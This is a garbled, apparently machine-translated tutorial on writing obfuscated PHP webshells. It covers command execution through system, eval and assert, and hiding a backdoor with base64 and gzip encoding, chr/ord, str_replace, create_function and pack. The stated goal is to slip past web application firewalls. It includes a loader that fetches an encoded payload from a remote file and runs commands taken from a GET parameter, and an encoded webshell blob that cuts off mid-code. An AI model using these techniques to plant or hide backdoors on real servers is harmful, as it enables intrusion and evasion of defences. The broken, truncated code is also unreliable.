0x1
The function is called immediately after the string variable is appended with parentheses:
<? PHP $s = ' system '; $e = ' assert '; $s (' WhoAmI '); $e (' Phpinfo (); ');
0x2
Functions commonly used to execute commands are:
system (' command ')eval(' PHP code ')assert(' PHP code ')
These three most commonly used
0x3
Base64_encode/base64_decode
<? PHP $b Base64_encode (' WhoAmI '); Echo $b. ' <br/> '; Echo Base64_decode ($b). ' <br/> ';
0x4
Gzcompress/gzuncompress compressing data
<? PHP $c gzcompress (' WhoAmI '); Echo $c. ' <br> '; Echo gzuncompress ($c). " <br/> ";
0x5
From the above command execution, Base64 plus 64 encoded with GZ compression, we can write a backdoor like this.
First, the back door compression, and then the back door Base64_encode (base64 code to prevent the character cause codes error).
If the backdoor is a PHP code, in the end we can use assert or eval to execute it.
In PHP, there is a function like this:
file_get_contents (URL)
This function allows you to save the contents of a file remotely to a variable:
$shell file_get_contents (' Http://localhost/shell.jpg ')
Start testing, starting with the simplest examples.
Make gzcompress and Base64_encode encoded files:
<? PHP $c = ' System '; $data gzcompress ($c); $file _data Base64_encode ($data); Echo $file _data ; fwrite (fopen$file _data);
So we've created a system string that's compressed and then 64 encoded.
Use:
<? PHP $c file_get_contents (' Http://localhost/shell.txt '); # Get Data $s gzuncompress (base64_decode($c)); # Decrypt Data $s ($_get[session]); # Execute Command
So the question is, why do we have to turn a big circle and come back?
The reason is simple, you compress the data, it is possible that some WAF does not detect the content is dangerous.
0x6
ASCII transcoding function: Chr/ord
<? PHP $str = ' System '; for ($count$countstrlen($str$count+ +) {echo substr($str$count, 1). ' ~ '. Ord (substr($str$count, 1)). ' <br/> ';}
/*
s~115
y~121
s~115
t~116
E~101
m~109*/
0x7
Str_replace Character substitution function:
<? PHP $s Str_replace (' P ', ', ' pspypsptpepmp '); Echo $s;
#system
0x8
Create_fuction () to create an anonymous function:
<? PHP # create_function (' parameter list ', ' PHP code string '); $info create_function (', ' phpinfo (); ' ); $info ();
0x9
Pack function
Pack (' Format ', hex string)
The pack function is a bit complicated, but not commonly used, if you want to convert a hexadecimal character, you can:
<? PHP $x Bin2Hex (' System '); $s PACK $x ); Echo $s. ' <br/> '; $s (' WhoAmI ');
The key usage of pack is that we can turn some sense functions into 16, then pack them back.
For example, Create_function (", $shell), $shell PHP code, we can use to hide some sensitive functions in PHP code.
<? php $shell =pack (' h* ', ' 2470617373776f72643d27 '). $password . pack (' h* ', ' 273b247368656c6c6e616d653d27 '). $Username . pack (' h* ', ' 273b246d7975726c3d27 '). $Url . pack (' h* ', ' 273b6576616c28677a756e636f6d7072657373286261736536345f6465636f64652827 '). ' ejzs/xt3hnd5jor/zazl71buw2rawqxu1uuqsopkgheabebslkid02g0gcyaaki7qyci+geczzxohm+ kjetiwzdbkmnzsi1fkmxhyzot8wqyk/hpcybjtjkzjln+z7n3vxvvx0bqtppjoozeoltq3/d73+/77tb6wqdbbxfhj2y/ 8zsb9c3gxn28vhunurhrrnc65cmxtzvo+vq0/hh5jvheuly6fi9cjba9s1h5ixyn/vanu18vffjnsnxeyl/ubnebzb3qbh3vs8/fhg/atbwuf/ Mistn+yfa9u7zb3wru. $f = Create_function ( "
Pack usage can be a filial piety here: Perl pack
Summarize
Create a GZ compression and Base64 encoded file (such as Logo.png), which is obtained using file_get_contents.
Use the Str_replace/chr/ord/create_fuction function to bypass some WAF detection.
PHP Webshell Common functions